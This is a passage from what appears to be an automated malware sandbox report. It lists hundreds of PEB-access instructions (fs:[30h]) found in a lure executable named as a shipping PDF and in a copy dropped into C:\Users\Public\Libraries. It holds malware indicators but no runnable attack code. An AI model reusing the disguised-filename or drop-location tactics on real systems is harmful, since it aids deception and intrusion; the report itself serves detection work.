        Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exeCode function: 11_2_00B85210 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exeCode function: 11_2_00B8AA16 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exeCode function: 11_2_00B8AA16 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exeCode function: 11_2_00B98A0A mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exeCode function: 11_2_00BC927A mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exeCode function: 11_2_00B89240 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exeCode function: 11_2_00B89240 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exeCode function: 11_2_00B89240 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exeCode function: 11_2_00B89240 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exeCode function: 11_2_00C053CA mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exeCode function: 11_2_00C053CA mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exeCode function: 11_2_00BB4BAD mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exeCode function: 11_2_00BB4BAD mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exeCode function: 11_2_00BB4BAD mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exeCode function: 11_2_00BBB390 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exeCode function: 11_2_00BB2397 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exeCode function: 11_2_00B91B8F mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exeCode function: 11_2_00B91B8F mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exeCode function: 11_2_00C3D380 mov ecx, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exeCode function: 11_2_00C4138A mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exeCode function: 11_2_00BADBE9 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exeCode function: 11_2_00BB03E2 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exeCode function: 11_2_00BB03E2 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exeCode function: 11_2_00BB03E2 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exeCode function: 11_2_00BB03E2 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exeCode function: 11_2_00BB03E2 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exeCode function: 11_2_00BB03E2 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exeCode function: 11_2_00C55BA5 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exeCode function: 11_2_00C58B58 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exeCode function: 11_2_00BB3B7A mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exeCode function: 11_2_00BB3B7A mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exeCode function: 11_2_00B8DB60 mov ecx, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exeCode function: 11_2_00C4131B mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exeCode function: 11_2_00B8F358 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exeCode function: 11_2_00B8DB40 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exeCode function: 11_2_00C58CD6 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exeCode function: 11_2_00B9849B mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exeCode function: 11_2_00C06CF0 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exeCode function: 11_2_00C06CF0 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exeCode function: 11_2_00C06CF0 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exeCode function: 11_2_00C414FB mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exeCode function: 11_2_00C1C450 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exeCode function: 11_2_00C1C450 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exeCode function: 11_2_00BBBC2C mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exeCode function: 11_2_00C41C06 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exeCode function: 11_2_00C41C06 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exeCode function: 11_2_00C41C06 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exeCode function: 11_2_00C41C06 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exeCode function: 11_2_00C41C06 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exeCode function: 11_2_00C41C06 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exeCode function: 11_2_00C41C06 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exeCode function: 11_2_00C41C06 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exeCode function: 11_2_00C41C06 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exeCode function: 11_2_00C41C06 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exeCode function: 11_2_00C41C06 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exeCode function: 11_2_00C41C06 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exeCode function: 11_2_00C41C06 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exeCode function: 11_2_00C41C06 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exeCode function: 11_2_00C5740D mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exeCode function: 11_2_00C5740D mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exeCode function: 11_2_00C5740D mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exeCode function: 11_2_00C06C0A mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exeCode function: 11_2_00C06C0A mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exeCode function: 11_2_00C06C0A mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exeCode function: 11_2_00C06C0A mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exeCode function: 11_2_00BA746D mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exeCode function: 11_2_00BBA44B mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exeCode function: 11_2_00C06DC9 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exeCode function: 11_2_00C06DC9 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exeCode function: 11_2_00C06DC9 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exeCode function: 11_2_00C06DC9 mov ecx, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exeCode function: 11_2_00C06DC9 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exeCode function: 11_2_00C06DC9 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exeCode function: 11_2_00BB1DB5 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exeCode function: 11_2_00BB1DB5 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exeCode function: 11_2_00BB1DB5 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exeCode function: 11_2_00BB35A1 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exeCode function: 11_2_00BBFD9B mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exeCode function: 11_2_00BBFD9B mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exeCode function: 11_2_00C38DF1 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exeCode function: 11_2_00B82D8A mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exeCode function: 11_2_00B82D8A mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exeCode function: 11_2_00B82D8A mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exeCode function: 11_2_00B82D8A mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exeCode function: 11_2_00B82D8A mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exeCode function: 17_2_00A020A0 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exeCode function: 17_2_00A020A0 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exeCode function: 17_2_00A020A0 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exeCode function: 17_2_00A020A0 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exeCode function: 17_2_00A020A0 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exeCode function: 17_2_00A020A0 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exeCode function: 17_2_00A190AF mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exeCode function: 17_2_009D9080 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exeCode function: 17_2_00A0F0BF mov ecx, dword ptr fs:[00000030h]
        Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exeCode function: 17_2_00A0F0BF mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exeCode function: 17_2_00A0F0BF mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exeCode function: 17_2_00A53884 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exeCode function: 17_2_00A53884 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exeCode function: 17_2_009D58EC mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exeCode function: 17_2_00A6B8D0 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exeCode function: 17_2_00A6B8D0 mov ecx, dword ptr fs:[00000030h]
        Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exeCode function: 17_2_00A6B8D0 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exeCode function: 17_2_00A6B8D0 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exeCode function: 17_2_00A6B8D0 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exeCode function: 17_2_00A6B8D0 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exeCode function: 17_2_00A0002D mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exeCode function: 17_2_00A0002D mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exeCode function: 17_2_00A0002D mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exeCode function: 17_2_00A0002D mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exeCode function: 17_2_00A0002D mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exeCode function: 17_2_00A57016 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exeCode function: 17_2_00A57016 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exeCode function: 17_2_00A57016 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exeCode function: 17_2_009EB02A mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exeCode function: 17_2_009EB02A mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exeCode function: 17_2_009EB02A mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exeCode function: 17_2_009EB02A mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exeCode function: 17_2_00AA4015 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exeCode function: 17_2_00AA4015 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exeCode function: 17_2_009F0050 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exeCode function: 17_2_009F0050 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exeCode function: 17_2_00A92073 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exeCode function: 17_2_00AA1074 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exeCode function: 17_2_00A061A0 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exeCode function: 17_2_00A061A0 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exeCode function: 17_2_00A569A6 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exeCode function: 17_2_00A551BE mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exeCode function: 17_2_00A551BE mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exeCode function: 17_2_00A551BE mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exeCode function: 17_2_00A551BE mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exeCode function: 17_2_009FC182 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exeCode function: 17_2_00A0A185 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exeCode function: 17_2_00A02990 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exeCode function: 17_2_00A641E8 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exeCode function: 17_2_009DB1E1 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exeCode function: 17_2_009DB1E1 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exeCode function: 17_2_009DB1E1 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exeCode function: 17_2_00A0513A mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exeCode function: 17_2_00A0513A mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exeCode function: 17_2_009D9100 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exeCode function: 17_2_009D9100 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exeCode function: 17_2_009D9100 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exeCode function: 17_2_009F4120 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exeCode function: 17_2_009F4120 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exeCode function: 17_2_009F4120 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exeCode function: 17_2_009F4120 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exeCode function: 17_2_009F4120 mov ecx, dword ptr fs:[00000030h]
        Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exeCode function: 17_2_009FB944 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exeCode function: 17_2_009FB944 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exeCode function: 17_2_009DB171 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exeCode function: 17_2_009DB171 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exeCode function: 17_2_009DC962 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exeCode function: 17_2_00A0FAB0 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exeCode function: 17_2_009EAAB0 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exeCode function: 17_2_009EAAB0 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exeCode function: 17_2_00A0D294 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exeCode function: 17_2_00A0D294 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exeCode function: 17_2_009D52A5 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exeCode function: 17_2_009D52A5 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exeCode function: 17_2_009D52A5 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exeCode function: 17_2_009D52A5 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exeCode function: 17_2_009D52A5 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exeCode function: 17_2_00A02AE4 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exeCode function: 17_2_00A02ACB mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exeCode function: 17_2_009F3A1C mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exeCode function: 17_2_009DAA16 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exeCode function: 17_2_009DAA16 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exeCode function: 17_2_00A14A2C mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exeCode function: 17_2_00A14A2C mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exeCode function: 17_2_009D5210 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exeCode function: 17_2_009D5210 mov ecx, dword ptr fs:[00000030h]
        Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exeCode function: 17_2_009D5210 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exeCode function: 17_2_009D5210 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exeCode function: 17_2_009E8A0A mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exeCode function: 17_2_00A8B260 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exeCode function: 17_2_00A8B260 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exeCode function: 17_2_00AA8A62 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exeCode function: 17_2_00A1927A mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exeCode function: 17_2_009D9240 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exeCode function: 17_2_009D9240 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exeCode function: 17_2_009D9240 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exeCode function: 17_2_009D9240 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exeCode function: 17_2_00A64257 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exeCode function: 17_2_00A9EA55 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exeCode function: 17_2_00A04BAD mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exeCode function: 17_2_00A04BAD mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exeCode function: 17_2_00A04BAD mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exeCode function: 17_2_00AA5BA5 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exeCode function: 17_2_009E1B8F mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exeCode function: 17_2_009E1B8F mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exeCode function: 17_2_00A9138A mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exeCode function: 17_2_00A8D380 mov ecx, dword ptr fs:[00000030h]
        Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exeCode function: 17_2_00A0B390 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exeCode function: 17_2_00A02397 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exeCode function: 17_2_00A003E2 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exeCode function: 17_2_00A003E2 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exeCode function: 17_2_00A003E2 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exeCode function: 17_2_00A003E2 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exeCode function: 17_2_00A003E2 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exeCode function: 17_2_00A003E2 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exeCode function: 17_2_00A553CA mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exeCode function: 17_2_00A553CA mov eax, dword ptr fs:[00000030h]
